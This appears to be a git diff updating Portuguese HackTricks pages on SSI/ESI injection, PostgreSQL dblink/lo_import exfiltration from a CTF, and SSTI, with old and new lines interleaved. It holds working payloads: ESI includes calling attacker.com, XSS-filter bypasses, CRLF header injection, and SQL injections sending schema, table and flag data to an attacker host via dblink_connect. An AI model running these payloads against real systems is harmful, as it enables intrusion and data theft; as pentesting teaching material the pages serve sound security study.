* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## Informações Básicas sobre Inclusão no Lado do Servidor
## Informações Básicas sobre Inclusão do Lado do Servidor
SSI (Server Side Includes) são diretivas que são **colocadas em páginas HTML e avaliadas no servidor** enquanto as páginas estão sendo fornecidas. Elas permitem **adicionar conteúdo gerado dinamicamente** a uma página HTML existente, sem a necessidade de fornecer a página inteira através de um programa CGI ou outra tecnologia dinâmica.\
(Definição retirada [daqui](https://httpd.apache.org/docs/current/howto/ssi.html))
SSI (Server Side Includes) são diretivas que são **colocadas em páginas HTML e avaliadas no servidor** enquanto as páginas estão sendo servidas. Elas permitem que você **adicione conteúdo gerado dinamicamente** a uma página HTML existente, sem precisar servir a página inteira por meio de um programa CGI ou outra tecnologia dinâmica.\
Por exemplo, você pode colocar uma diretiva em uma página HTML existente, como:
`<!--#echo var="DATE_LOCAL" -->`
E, quando a página é fornecida, este fragmento será avaliado e substituído pelo seu valor:
E, quando a página é servida, este fragmento será avaliado e substituído por seu valor:
`Terça-feira, 15-Jan-2013 19:28:54 EST`
A decisão de quando usar SSI, e quando ter sua página inteiramente gerada por algum programa, geralmente é uma questão de quanto da página é estático e quanto precisa ser recalculado cada vez que a página é fornecida. SSI é uma ótima maneira de adicionar pequenas peças de informação, como a hora atual - mostrada acima. Mas se a maioria da sua página está sendo gerada no momento em que é fornecida, você precisa procurar outra solução. (Definição retirada de [aqui](https://httpd.apache.org/docs/current/howto/ssi.html)).
A decisão de quando usar SSI e quando ter sua página inteiramente gerada por algum programa é geralmente uma questão de quanta parte da página é estática e quanto precisa ser recalculado toda vez que a página é servida. SSI é uma ótima maneira de adicionar pequenos pedaços de informação, como o horário atual - mostrado acima. Mas se a maioria da sua página está sendo gerada no momento em que é servida, você precisa procurar por outra solução.
Você pode inferir a presença de SSI se a aplicação web usa arquivos com as extensões \*\* `.shtml`, `.shtm` ou `.stm`\*\*, mas não é apenas o caso.
Você pode inferir a presença de SSI se a aplicação web usar arquivos com as extensões \*\* `.shtml`, `.shtm` ou `.stm`\*\*, mas não é o único caso.
Uma expressão SSI típica tem o seguinte formato:
```
<!--#directive param="value" -->
```
### Verificar
### Verificação
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
@ -64,19 +66,18 @@ Uma expressão SSI típica tem o seguinte formato:
<!--#set var="name" value="Rich" -->
```
## Inclusão no Lado do Servidor (Edge Side Inclusion)
## Inclusão Lateral
Há um problema ao **armazenar informações ou aplicações dinâmicas em cache**, pois parte do conteúdo pode ter **variado** para a próxima vez que o conteúdo for recuperado. É para isso que o **ESI** é utilizado, para indicar usando tags ESI o **conteúdo dinâmico que precisa ser gerado** antes de enviar a versão em cache.\
Se um **atacante** conseguir **injetar uma tag ESI** dentro do conteúdo em cache, então, ele poderá **injetar conteúdo arbitrário** no documento antes de ser enviado aos usuários.
Existe um problema **em armazenar em cache informações ou aplicativos dinâmicos**, pois parte do conteúdo pode ter **variações** para a próxima vez que o conteúdo for recuperado. É para isso que o **ESI** é usado, para indicar usando tags ESI o **conteúdo dinâmico que precisa ser gerado** antes de enviar a versão em cache. Se um **atacante** for capaz de **injetar uma tag ESI** dentro do conteúdo em cache, então ele poderá **injetar conteúdo arbitrário** no documento antes que seja enviado aos usuários.
### Detecção de ESI
O seguinte **cabeçalho** em uma resposta do servidor indica que o servidor está utilizando ESI:
O seguinte **cabeçalho** em uma resposta do servidor significa que o servidor está usando ESI:
```
Surrogate-Control: content="ESI/1.0"
```
Se você não encontrar esse cabeçalho, o servidor **pode estar usando ESI mesmo assim**.\
Uma **abordagem de exploração cega também pode ser utilizada**, já que uma solicitação deve chegar ao servidor do atacante:
Se não conseguir encontrar este cabeçalho, o servidor **pode estar a usar ESI de qualquer forma**.\
Uma **abordagem de exploração cega também pode ser usada** pois um pedido deve chegar ao servidor do atacante:
```javascript
// Basic detection
hell<!--esi-->o
@ -101,20 +102,20 @@ hell<!--esi-->o
[GoSecure](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) criou uma tabela para nos ajudar a entender possíveis ataques que podemos tentar contra diferentes softwares capazes de ESI, dependendo da funcionalidade suportada. Vamos fornecer algumas explicações sobre os nomes das colunas da tabela abaixo primeiro:
* **Includes**: Suporta a diretiva `<esi:includes>`
* **Vars**: Suporta a diretiva `<esi:vars>`. Útil para contornar Filtros de XSS
* **Cookie**: Cookies do documento são acessíveis pelo motor de ESI
* **Upstream Headers Required**: Aplicações substitutas não processarão declarações de ESI a menos que a aplicação a montante forneça os cabeçalhos
* **Host Allowlist**: Neste caso, inclusões de ESI só são possíveis a partir de hosts de servidores permitidos, tornando SSRF, por exemplo, possível apenas contra esses hosts
- **Includes**: Suporta a diretiva `<esi:includes>`
- **Vars**: Suporta a diretiva `<esi:vars>`. Útil para contornar Filtros XSS
- **Cookie**: Os cookies do documento são acessíveis ao mecanismo ESI
- **Upstream Headers Required**: As aplicações substitutas não processarão declarações ESI a menos que a aplicação upstream forneça os cabeçalhos
- **Host Allowlist**: Neste caso, as inclusões ESI são apenas possíveis a partir de hosts de servidor permitidos, tornando, por exemplo, SSRF apenas possível contra esses hosts
| **Software** | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
| Squid3 | Sim | Sim | Sim | Sim | Não |
| Varnish Cache | Sim | Não | Não | Sim | Sim |
| Fastly | Sim | Não | Não | Não | Sim |
| Varnish Cache | Sim | Não | Não | Sim | Sim |
| Fastly | Sim | Não | Não | Não | Sim |
| Akamai ESI Test Server (ETS) | Sim | Sim | Sim | Não | Não |
| NodeJS esi | Sim | Sim | Sim | Não | Não |
| NodeJS nodesi | Sim | Não | Não | Não | Opcional |
| NodeJS nodesi | Sim | Não | Não | Não | Opcional |
#### XSS
@ -124,7 +125,7 @@ A seguinte diretiva ESI carregará um arquivo arbitrário dentro da resposta do
```
O arquivo _http://attacker.com/xss.html_ pode conter um payload XSS como `<script>alert(1)</script>`
#### Bypass na proteção contra XSS do cliente
#### Bypass proteção XSS do cliente
```markup
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
@ -146,7 +147,11 @@ Use <!--esi--> to bypass WAFs:
# Reflect XSS
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
```
* Domínio completo da conta refletindo cookies
<figure><img src="../.gitbook/assets/image (4) (7).png" alt=""><figcaption></figcaption></figure>
* Assunção total de conta ao refletir cookies
<figure><img src="../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
#### Arquivo Local Privado
@ -155,18 +160,20 @@ Não confunda isso com uma "Inclusão de Arquivo Local":
<esi:include src="secret.txt">
```
#### CRLF
CRLF (Carriage Return Line Feed) é um caractere de controle utilizado para indicar uma quebra de linha em diversos sistemas operacionais. Em ataques de injeção de inclusão de servidor (SSI) e de inclusão de borda (ESI), os invasores podem explorar vulnerabilidades CRLF para inserir cabeçalhos HTTP maliciosos ou forjar respostas de servidor.
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### Redirecionamento Aberto
O seguinte adicionará um cabeçalho `Location` à resposta
O seguinte irá adicionar um cabeçalho `Location` à resposta
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
#### Adicionar Cabeçalho
* Adicionar cabeçalho em requisição forçada
* Adicionar cabeçalho na solicitação forçada
```html
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
@ -178,7 +185,9 @@ O seguinte adicionará um cabeçalho `Location` à resposta
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
```
#### CRLF no Cabeçalho Add (**CVE-2019-2438)**
<figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
#### CRLF em Adicionar cabeçalho (**CVE-2019-2438)**
```markup
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
@ -193,7 +202,7 @@ Isso enviará informações de depuração incluídas na resposta:
```
### ESI + XSLT = XXE
Também é possível adicionar inclusões ESI baseadas em \*\* **\_**eXtensible Stylesheet Language Transformations (XSLT)**\_** \*\* especificando o valor `xslt` para o parâmetro _dca_. A inclusão a seguir fará com que o substituto HTTP solicite o arquivo XML e XSLT. O arquivo XSLT é então usado para filtrar o arquivo XML. Este arquivo XML pode ser usado para realizar ataques _XML External Entity (XXE)_. Isso permite que atacantes realizem ataques SSRF, o que não é muito útil, já que isso deve ser realizado por meio de inclusões ESI, que já é um vetor SSRF por si só. DTDs externos não são analisados, pois a biblioteca subjacente (Xalan) não tem suporte para isso. Isso significa que não podemos extrair arquivos locais.
Também é possível adicionar inclusões ESI baseadas em \*\* **\_**eXtensible Stylesheet Language Transformations (XSLT)**\_** \*\* especificando o valor `xslt` para o parâmetro _dca_. A inclusão a seguir fará com que o servidor HTTP solicite o arquivo XML e XSLT. O arquivo XSLT é então usado para filtrar o arquivo XML. Este arquivo XML pode ser usado para realizar ataques de _XML External Entity (XXE)_. Isso permite que os atacantes realizem ataques SSRF, o que não é muito útil, pois isso deve ser feito por meio de inclusões ESI, que é um vetor SSRF em si. DTDs externos não são analisados, pois a biblioteca subjacente (Xalan) não oferece suporte para isso. Isso significa que não podemos extrair arquivos locais.
```markup
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
@ -216,20 +225,20 @@ Verifique a página XSLT:
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
## Lista de Detecção de Brute-Force
## Lista de Detecção de Força Bruta
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
<details>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

173
pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
View file

@ -1,175 +1,34 @@
# Exfiltração de dados com dblink/lo_import
# Exfiltração de dados com dblink/lo\_import
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Este é um exemplo de como exfiltrar dados carregando arquivos no banco de dados com `lo_import` e exfiltrá-los usando `dblink_connect`.**
## Preparando o servidor de exfiltração/Injeção SQL Assíncrona
**Verifique a solução em:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
**Extraído de:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
Como o `pg_sleep` também não causa atraso, podemos assumir com segurança que a execução da consulta ocorre em segundo plano ou de forma assíncrona.
Normalmente, `dblink_connect` pode ser usado para abrir uma conexão persistente com um banco de dados PostgreSQL remoto (por exemplo, `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`). Como podemos controlar o parâmetro desta função, podemos realizar um SQL Server Side Request Forgery para o nosso próprio host. Isso significa que podemos realizar uma Injeção SQL Out-of-Band para exfiltrar dados dos resultados de consultas SQL. Existem pelo menos duas maneiras de fazer isso:
1. Configurar um **servidor DNS** e, em seguida, acionar a conexão para `[data].our.domain` para que possamos ver os dados no log ou nos pacotes de rede DNS.
2. Configurar um **servidor PostgreSQL público, monitorar os pacotes de rede que chegam à porta do PostgreSQL**, e então acionar uma conexão para o nosso host com dados exfiltrados como `user`/`dbname`. Por **padrão**, o PostgreSQL não usa SSL para comunicação, então podemos ver `user`/`dbname` como um **texto simples** na rede.
O **segundo método é mais fácil** porque não precisamos de nenhum domínio. Precisamos apenas configurar um servidor com um IP público, instalar o PostgreSQL, configurar o serviço PostgreSQL para ouvir em \*/0.0.0.0 e executar um dumper de rede (por exemplo, tcpdump) para monitorar o tráfego para a porta do PostgreSQL (5432 por padrão).
Para configurar o PostgreSQL para que ele **escute publicamente**, defina `listen_addresses` em `postgresql.conf` para `*`.
```
listen_addresses = '*'
```
Para monitorar o tráfego de entrada, execute `tcpdump` para monitorar a porta 5432.
```
sudo tcpdump -nX -i eth0 port 5432
```
Para verificar se obtemos uma conexão do alvo, podemos tentar usar esta consulta:
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) --
```
Se bem-sucedido, obtemos um pedaço do pacote de rede com `user` e `dbname` legíveis.
```
17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42
0x0000: 4500 005e 9417 4000 2706 248c 36b9 a3fe E..^..@.'.$.6...
0x0010: 9de6 2259 c718 2061 5889 142a 9f8a cb5d .."Y...aX..*...]
0x0020: 8018 00e5 1701 0000 0101 080a 39d2 393d ............9.9=
0x0030: 3924 7ef6 0000 002a 0003 0000 7573 6572 9$~....*....user
0x0040: 0066 6172 6973 7600 6461 7461 6261 7365 .farisv.database
0x0050: 0068 656c 6c6f 6672 6f6d 6662 0000 .hellofromfb.
```
Então, podemos **continuar a extrair o banco de dados usando várias consultas PostgreSQL**. Observe que para cada resultado de consulta que contém espaços em branco, precisamos converter o resultado para **hex/base64** com a função `encode` ou substituir o espaço em branco por outro caractere com a função `replace`, pois isso causará um erro de execução durante o processo `dblink_connect`.
Obter uma **lista** de **esquemas**:
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --
```
```
17:36:46.538178 IP 54.185.163.254.51018 > [REDACTED]: Flags [P.], seq 1:70, ack 1, win 229, options [nop,nop,TS val 971433789 ecr 960048322], length 69
0x0000: 4500 0079 ecd5 4000 2706 cbb2 36b9 a3fe E..y..@.'...6...
0x0010: 9de6 2259 c74a 2061 1e74 4769 b404 803d .."Y.J.a.tGi...=
0x0020: 8018 00e5 2710 0000 0101 080a 39e6 e73d ....'.......9..=
0x0030: 3939 2cc2 0000 0045 0003 0000 7573 6572 99,....E....user
0x0040: 0070 7562 6c69 633a 696e 666f 726d 6174 .public:informat
0x0050: 696f 6e5f 7363 6865 6d61 3a70 675f 6361 ion_schema:pg_ca
0x0060: 7461 6c6f 6700 6461 7461 6261 7365 0070 talog.database.p
0x0070: 6f73 7467 7265 7300 00 ostgres.
```
Obtenha uma **lista** de **tabelas** no esquema atual:
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) --
```
```
17:38:30.515438 IP 54.185.163.254.51026 > [REDACTED]: Flags [P.], seq 1:42, ack 1, win 229, options [nop,nop,TS val 971537775 ecr 960152304], length 41
0x0000: 4500 005d f371 4000 2706 c532 36b9 a3fe E..].q@.'..26...
0x0010: 9de6 2259 c752 2061 8dd4 e226 24a3 a5c5 .."Y.R.a...&$...
0x0020: 8018 00e5 fe2b 0000 0101 080a 39e8 7d6f .....+......9.}o
0x0030: 393a c2f0 0000 0029 0003 0000 7573 6572 9:.....)....user
0x0040: 0073 6561 7263 6865 7300 6461 7461 6261 .searches.databa
0x0050: 7365 0070 6f73 7467 7265 7300 00 se.postgres.
```
**Conte** as **linhas** na tabela `searches`.
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) --
```
```
17:42:39.511643 IP 54.185.163.254.51034 > [REDACTED]: Flags [P.], seq 1:35, ack 1, win 229, options [nop,nop,TS val 971786760 ecr 960401280], length 34
0x0000: 4500 0056 7982 4000 2706 3f29 36b9 a3fe E..Vy.@.'.?)6...
0x0010: 9de6 2259 c75a 2061 5ec0 7df0 8611 357d .."Y.Z.a^.}...5}
0x0020: 8018 00e5 f855 0000 0101 080a 39ec 4a08 .....U......9.J.
0x0030: 393e 8f80 0000 0022 0003 0000 7573 6572 9>....."....user
0x0040: 0030 0064 6174 6162 6173 6500 706f 7374 .0.database.post
0x0050: 6772 6573 0000 gres.
```
Parece que só tem uma tabela vazia no esquema atual e a flag não está no banco de dados. Podemos realmente precisar exfiltrar dados de `/var/lib/postgresql/data/secret`. Infelizmente, se tentarmos usar `pg_read_file` ou `pg_read_binary_file` para ler o arquivo, não obteremos uma conexão de entrada, de modo que o usuário atual pode não ter permissão para usar essas funções.
#### Mais informações sobre SQLInjection assíncrono com postdresql
* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
## **Exfiltrando conteúdos de large object**
É possível ler arquivos usando large objects ([https://www.postgresql.org/docs/11/lo-funcs.html](https://www.postgresql.org/docs/11/lo-funcs.html)). Podemos usar `lo_import` para carregar o conteúdo do arquivo no catálogo `pg_largeobject`. Se a consulta for bem-sucedida, obteremos o `oid` do objeto.
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) --
```
```
17:54:51.963925 IP 54.185.163.254.51046 > [REDACTED]: Flags [P.], seq 1:39, ack 1, win 229, options [nop,nop,TS val 972519214 ecr 961133706], length 38
0x0000: 4500 005a 071f 4000 2706 b188 36b9 a3fe E..Z..@.'...6...
0x0010: 9de6 2259 c766 2061 26fb c8a7 bbb3 fe01 .."Y.f.a&.......
0x0020: 8018 00e5 2272 0000 0101 080a 39f7 772e ...."r......9.w.
0x0030: 3949 bc8a 0000 0026 0003 0000 7573 6572 9I.....&....user
0x0040: 0032 3436 3638 0064 6174 6162 6173 6500 .24668.database.
0x0050: 706f 7374 6772 6573 0000 postgres..
```
Conseguimos 24668 como `oid`, o que significa que podemos usar a função `lo_import`. Infelizmente, não obteremos resultados se tentarmos obter o conteúdo do objeto grande usando `lo_get(24668)` ou acessar diretamente o catálogo `pg_largeobject`. **Parece que o usuário atual não tem permissão para ler o conteúdo de novos objetos.**
Após ler a documentação sobre objetos grandes no PostgreSQL, podemos descobrir que **objetos grandes podem ter ACL** (Lista de Controle de Acesso). Isso significa que, se houver um objeto antigo com uma ACL que permita ao usuário atual lê-lo, então podemos exfiltrar o conteúdo desse objeto.
Podemos obter uma lista de `oid` de objetos grandes disponíveis extraindo de `pg_largeobject_metadata`.
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) --
```
```
18:06:57.172285 IP 54.185.163.254.51052 > [REDACTED]: Flags [.], seq 1:2897, ack 1, win 229, options [nop,nop,TS val 973244413 ecr 961858878], length 2896
0x0000: 4500 0b84 7adf 4000 2606 339e 36b9 a3fe E...z.@.&.3.6...
0x0010: 9de6 2259 c76c 2061 8d76 e934 10c9 3972 .."Y.l.a.v.4..9r
0x0020: 8010 00e5 a66d 0000 0101 080a 3a02 87fd .....m......:...
0x0030: 3954 cd3e 0000 1c94 0003 0000 7573 6572 9T.>........user
0x0040: 0031 3635 3731 3a31 3634 3339 3a31 3635 .16571:16439:165
0x0050: 3732 3a31 3634 3431 3a31 3634 3432 3a31 72:16441:16442:1
0x0060: 3733 3732 3a31 3634 3434 3a31 3634 3435 7372:16444:16445
0x0070: 3a31 3831 3534 3a31 3733 3830 3a31 3737 :18154:17380:177
0x0080: 3038 3a31 3635 3737 3a31 3634 3530 3a31 08:16577:16450:1
0x0090: 3634 3531 3a31 3634 3532 3a31 3634 3533 6451:16452:16453
.....
.....
.....
```
```markdown
Conseguimos uma série de `oid`s. Podemos tentar usar `lo_get` para carregar o conteúdo do objeto. Por exemplo, `lo_get(16439)` carregará o conteúdo de `/etc/passwd`. Como o resultado de `lo_gets` é `bytea`, precisamos convertê-lo para `UTF8` para que possa ser anexado na consulta.
Podemos tentar carregar alguns objetos com o menor `oid` para descobrir se o arquivo de flag foi carregado anteriormente. O objeto do arquivo de flag realmente existe com `oid` 16444. Não há espaços em branco na flag, então podemos exibi-la como está.
Para carregar a flag:
```
```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=p
```
#### Mais informações sobre oid:
* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module](https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module)
* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

225
pentesting-web/ssti-server-side-template-injection/README.md
View file

@ -1,16 +1,16 @@
# SSTI (Injeção de Template no Lado do Servidor)
# SSTI (Server Side Template Injection)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
